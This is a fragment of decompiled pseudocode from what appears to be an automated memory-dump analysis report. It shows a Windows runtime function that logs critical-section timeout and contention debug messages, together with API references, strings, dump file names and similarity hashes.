				_t7 = E0464CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04695720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04695720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0469FDFA
Strings
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0469FE2B
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0469FE01
Memory Dump Source
• Source File: 00000006.00000002.481102296.00000000045E0000.00000040.00000001.sdmp, Offset: 045E0000, based on PE: true
• Associated: 00000006.00000002.481913067.00000000046FB000.00000040.00000001.sdmp
• Associated: 00000006.00000002.481925699.00000000046FF000.00000040.00000001.sdmp
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
• API String ID: 885266447-3903918235
• Opcode ID: 6ff148161b634d82ea87d09b9308b3538aa84cabd0b295fec58a701324ddd139
• Instruction ID: 7280948127e90eb35be6e3daff5e1122b48358612c33ce7341ff6e9fa6833c90
• Opcode Fuzzy Hash: 6ff148161b634d82ea87d09b9308b3538aa84cabd0b295fec58a701324ddd139
• Instruction Fuzzy Hash: 33F0C272240201BBEA251A45DC06E23BB9EEB44730F150218F6289A1D1FAA2BD2196A9
Uniqueness
• Uniqueness Score: -1.00%